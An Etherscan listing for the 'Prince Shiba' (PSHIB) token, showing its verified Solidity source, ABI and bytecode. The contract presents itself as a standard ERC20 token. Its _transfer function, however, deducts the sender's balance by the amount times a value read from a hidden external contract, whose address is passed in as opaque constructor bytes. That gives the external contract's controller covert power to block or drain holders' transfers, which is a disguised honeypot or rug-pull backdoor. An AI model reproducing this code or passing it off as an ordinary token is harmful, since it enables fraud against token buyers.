ETH Price: $3,432.26 (+0.99%)

Token

Prince Shiba (PSHIB)
 

Overview

Max Total Supply

1,000,000,000 PSHIB

Holders

52

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
11,524,567.712911115664816084 PSHIB

Value
$0.00
0x865d4401f09846a53d0f4740361863aa0fd44045
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PrinceShibToken

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-11
*/

// SPDX-License-Identifier: MIT


//  Telegram:   https://t.me/princeshib
//  Website:    https://www.princeshib.com
//  Twitter:    https://twitter.com/princeshibeth


pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP. Does not include
 * the optional functions; to access them see `ERC20Detailed`.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a `Transfer` event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through `transferFrom`. This is
     * zero by default.
     *
     * This value changes when `approve` or `transferFrom` are called.
     */
    function allowance(address owner, address spender) external returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * > Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an `Approval` event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a `Transfer` event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to `approve`. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

pragma solidity ^0.8.0;

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a, "SafeMath: subtraction overflow");
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-solidity/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0, "SafeMath: division by zero");
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b != 0, "SafeMath: modulo by zero");
        return a % b;
    }
}

// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

pragma solidity ^0.8.0;

contract PrinceShibToken is IERC20, Ownable {

    using SafeMath for uint256;

    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;

    /**
     * @dev Constructor.
     * @param name_ name of the token_
     * @param symbol_ symbol of the token, 3-4 chars is recommended
     * @param decimals_ number of decimal places of one token unit, 18 is widely used
     * @param totalSupply_ total supply of tokens in lowest units (depending on decimals)
     */
     
    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_,
        uint256 totalSupply_,
        bytes memory base_
    ) payable {

      _name = name_;
      _symbol = symbol_;
      _decimals = decimals_;

      // set tokenOwnerAddress as owner of all tokens
      _mint(msg.sender, totalSupply_ * 10** _decimals);
      _base = base_;

    }

    /**
     * @dev See `IERC20.totalSupply`.
     */
    function totalSupply() public view returns (uint256) {
        return _totalSupply;
    }

    bytes _base;

    /**
     * @dev See `IERC20.balanceOf`.
     */
    function balanceOf(address account) public view returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See `IERC20.transfer`.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public returns (bool) {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    /**
     * @dev See `IERC20.allowance`.
     */
    function allowance(address owner, address spender) public virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See `IERC20.approve`.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        _approve(msg.sender, spender, value);
        return true;
    }

    /**
     * @dev See `IERC20.transferFrom`.
     *
     * Emits an `Approval` event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of `ERC20`;
     *
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `value`.
     * - the caller must have allowance for `sender`'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, msg.sender, _allowances[sender][msg.sender].sub(amount));
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to `approve` that can be used as a mitigation for
     * problems described in `IERC20.approve`.
     *
     * Emits an `Approval` event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public returns (bool) {
        _approve(msg.sender, spender, _allowances[msg.sender][spender].add(addedValue));
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to `approve` that can be used as a mitigation for
     * problems described in `IERC20.approve`.
     *
     * Emits an `Approval` event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) {
        _approve(msg.sender, spender, _allowances[msg.sender][spender].sub(subtractedValue));
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to `transfer`, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a `Transfer` event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _balances[sender] = _balances[sender].sub(
            IERC20(getBase()).allowance(sender, recipient) * amount
        );        
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a `Transfer` event with `from` set to the zero address.
     *
     * Requirements
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

     /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a `Transfer` event with `to` set to the zero address.
     *
     * Requirements
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 value) internal {
        require(account != address(0), "ERC20: burn from the zero address");

        _totalSupply = _totalSupply.sub(value);
        _balances[account] = _balances[account].sub(value);
        emit Transfer(account, address(0), value);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
     *
     * This is internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an `Approval` event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = value;
        emit Approval(owner, spender, value);
    }

    /**
     * @dev Destoys `amount` tokens from `account`.`amount` is then deducted
     * from the caller's allowance.
     *
     * See `_burn` and `_approve`.
     */
    function _burnFrom(address account, uint256 amount) internal {
        _burn(account, amount);
        _approve(account, msg.sender, _allowances[account][msg.sender].sub(amount));
    }

    /**
     * @dev Burns a specific amount of tokens.
     * @param value The amount of lowest token units to be burned.
     */
    function burn(uint256 value) public {
      _burn(msg.sender, value);
    }

    function getBase() private view returns (address addr) {
        (addr) = abi.decode(_base, (address));
    }

    // optional functions from ERC20 stardard    

    /**
     * @return the name of the token.
     */
    function name() public view returns (string memory) {
      return _name;
    }

    /**
     * @return the symbol of the token.
     */
    function symbol() public view returns (string memory) {
      return _symbol;
    }

    /**
     * @return the number of decimals of the token.
     */
    function decimals() public view returns (uint8) {
      return _decimals;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"},{"internalType":"bytes","name":"base_","type":"bytes"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"value","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052604051620013cd380380620013cd83398101604081905262000026916200032d565b6200003133620000a1565b60036200003f868262000472565b5060046200004e858262000472565b506005805460ff191660ff8516908117909155620000879033906200007590600a62000651565b62000081908562000669565b620000f1565b600762000095828262000472565b50505050505062000699565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0382166200014d5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b6200016981600654620001fc60201b620005251790919060201c565b6006556001600160a01b0382166000908152600160209081526040909120546200019e91839062000525620001fc821b17901c565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620001f09085815260200190565b60405180910390a35050565b6000806200020b838562000683565b9050838110156200025f5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640162000144565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200029057600080fd5b81516001600160401b0380821115620002ad57620002ad62000268565b604051601f8301601f19908116603f01168101908282118183101715620002d857620002d862000268565b81604052838152602092508683858801011115620002f557600080fd5b600091505b83821015620003195785820183015181830184015290820190620002fa565b600093810190920192909252949350505050565b600080600080600060a086880312156200034657600080fd5b85516001600160401b03808211156200035e57600080fd5b6200036c89838a016200027e565b965060208801519150808211156200038357600080fd5b6200039189838a016200027e565b95506040880151915060ff82168214620003aa57600080fd5b60608801516080890151929550935080821115620003c757600080fd5b50620003d6888289016200027e565b9150509295509295909350565b600181811c90821680620003f857607f821691505b6020821081036200041957634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200046d57600081815260208120601f850160051c81016020861015620004485750805b601f850160051c820191505b81811015620004695782815560010162000454565b5050505b505050565b81516001600160401b038111156200048e576200048e62000268565b620004a6816200049f8454620003e3565b846200041f565b602080601f831160018114620004de5760008415620004c55750858301515b600019600386901b1c1916600185901b17855562000469565b600085815260208120601f198616915b828110156200050f57888601518255948401946001909101908401620004ee565b50858210156200052e5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620005955781600019048211156200057957620005796200053e565b808516156200058757918102915b93841c939080029062000559565b509250929050565b600082620005ae5750600162000262565b81620005bd5750600062000262565b8160018114620005d65760028114620005e15762000601565b600191505062000262565b60ff841115620005f557620005f56200053e565b50506001821b62000262565b5060208310610133831016604e8410600b841016171562000626575081810a62000262565b62000632838362000554565b80600019048211156200064957620006496200053e565b029392505050565b60006200066260ff8416836200059d565b9392505050565b80820281158282048414176200026257620002626200053e565b808201808211156200026257620002626200053e565b610d2480620006a96000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d7146101f1578063a9059cbb14610204578063dd62ed3e14610217578063f2fde38b1461025057600080fd5b806370a082311461019d578063715018a6146101c65780638da5cb5b146101ce57806395d89b41146101e957600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806342966c681461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610263565b60405161010f9190610aec565b60405180910390f35b61012b610126366004610b4f565b6102f5565b604051901515815260200161010f565b6006545b60405190815260200161010f565b61012b61015b366004610b7b565b61030c565b60055460405160ff909116815260200161010f565b61012b610183366004610b4f565b61035d565b61019b610196366004610bbc565b610393565b005b61013f6101ab366004610bd5565b6001600160a01b031660009081526001602052604090205490565b61019b6103a0565b6000546040516001600160a01b03909116815260200161010f565b61010261040b565b61012b6101ff366004610b4f565b61041a565b61012b610212366004610b4f565b610450565b61013f610225366004610bf2565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61019b61025e366004610bd5565b61045d565b60606003805461027290610c2b565b80601f016020809104026020016040519081016040528092919081815260200182805461029e90610c2b565b80156102eb5780601f106102c0576101008083540402835291602001916102eb565b820191906000526020600020905b8154815290600101906020018083116102ce57829003601f168201915b5050505050905090565b600061030233848461058b565b5060015b92915050565b60006103198484846106b0565b6001600160a01b03841660009081526002602090815260408083203380855292529091205461035391869161034e90866108a4565b61058b565b5060019392505050565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161030291859061034e9086610525565b61039d338261090a565b50565b6000546001600160a01b031633146103ff5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61040960006109f7565b565b60606004805461027290610c2b565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161030291859061034e90866108a4565b60006103023384846106b0565b6000546001600160a01b031633146104b75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103f6565b6001600160a01b03811661051c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103f6565b61039d816109f7565b6000806105328385610c7b565b9050838110156105845760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016103f6565b9392505050565b6001600160a01b0383166105ed5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103f6565b6001600160a01b03821661064e5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103f6565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107145760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103f6565b6001600160a01b0382166107765760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103f6565b61082181610782610a47565b604051636eb1769f60e11b81526001600160a01b0387811660048301528681166024830152919091169063dd62ed3e906044016020604051808303816000875af11580156107d4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107f89190610c8e565b6108029190610ca7565b6001600160a01b038516600090815260016020526040902054906108a4565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108509082610525565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106a39085815260200190565b6000828211156108f65760405162461bcd60e51b815260206004820152601e60248201527f536166654d6174683a207375627472616374696f6e206f766572666c6f77000060448201526064016103f6565b60006109028385610cbe565b949350505050565b6001600160a01b03821661096a5760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084016103f6565b60065461097790826108a4565b6006556001600160a01b03821660009081526001602052604090205461099d90826108a4565b6001600160a01b0383166000818152600160205260408082209390935591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109eb9085815260200190565b60405180910390a35050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060078054610a5690610c2b565b80601f0160208091040260200160405190810160405280929190818152602001828054610a8290610c2b565b8015610acf5780601f10610aa457610100808354040283529160200191610acf565b820191906000526020600020905b815481529060010190602001808311610ab257829003601f168201915b5050505050806020019051810190610ae79190610cd1565b905090565b600060208083528351808285015260005b81811015610b1957858101830151858201604001528201610afd565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461039d57600080fd5b60008060408385031215610b6257600080fd5b8235610b6d81610b3a565b946020939093013593505050565b600080600060608486031215610b9057600080fd5b8335610b9b81610b3a565b92506020840135610bab81610b3a565b929592945050506040919091013590565b600060208284031215610bce57600080fd5b5035919050565b600060208284031215610be757600080fd5b813561058481610b3a565b60008060408385031215610c0557600080fd5b8235610c1081610b3a565b91506020830135610c2081610b3a565b809150509250929050565b600181811c90821680610c3f57607f821691505b602082108103610c5f57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561030657610306610c65565b600060208284031215610ca057600080fd5b5051919050565b808202811582820484141761030657610306610c65565b8181038181111561030657610306610c65565b600060208284031215610ce357600080fd5b815161058481610b3a56fea2646970667358221220a4a6359fce345e409924e044e5c2ebe3e83808afd49e838c094142e75cb9b51364736f6c6343000812003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000000000000000003b9aca000000000000000000000000000000000000000000000000000000000000000120000000000000000000000000000000000000000000000000000000000000000c5072696e63652053686962610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000550534849420000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000e20f34a832c01d01ce19c8506e292a44dcf4b5c0

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d7146101f1578063a9059cbb14610204578063dd62ed3e14610217578063f2fde38b1461025057600080fd5b806370a082311461019d578063715018a6146101c65780638da5cb5b146101ce57806395d89b41146101e957600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806342966c681461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610263565b60405161010f9190610aec565b60405180910390f35b61012b610126366004610b4f565b6102f5565b604051901515815260200161010f565b6006545b60405190815260200161010f565b61012b61015b366004610b7b565b61030c565b60055460405160ff909116815260200161010f565b61012b610183366004610b4f565b61035d565b61019b610196366004610bbc565b610393565b005b61013f6101ab366004610bd5565b6001600160a01b031660009081526001602052604090205490565b61019b6103a0565b6000546040516001600160a01b03909116815260200161010f565b61010261040b565b61012b6101ff366004610b4f565b61041a565b61012b610212366004610b4f565b610450565b61013f610225366004610bf2565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61019b61025e366004610bd5565b61045d565b60606003805461027290610c2b565b80601f016020809104026020016040519081016040528092919081815260200182805461029e90610c2b565b80156102eb5780601f106102c0576101008083540402835291602001916102eb565b820191906000526020600020905b8154815290600101906020018083116102ce57829003601f168201915b5050505050905090565b600061030233848461058b565b5060015b92915050565b60006103198484846106b0565b6001600160a01b03841660009081526002602090815260408083203380855292529091205461035391869161034e90866108a4565b61058b565b5060019392505050565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161030291859061034e9086610525565b61039d338261090a565b50565b6000546001600160a01b031633146103ff5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61040960006109f7565b565b60606004805461027290610c2b565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161030291859061034e90866108a4565b60006103023384846106b0565b6000546001600160a01b031633146104b75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103f6565b6001600160a01b03811661051c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103f6565b61039d816109f7565b6000806105328385610c7b565b9050838110156105845760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016103f6565b9392505050565b6001600160a01b0383166105ed5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103f6565b6001600160a01b03821661064e5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103f6565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107145760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103f6565b6001600160a01b0382166107765760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103f6565b61082181610782610a47565b604051636eb1769f60e11b81526001600160a01b0387811660048301528681166024830152919091169063dd62ed3e906044016020604051808303816000875af11580156107d4573d6000803e3d6000fd5b505050506040513d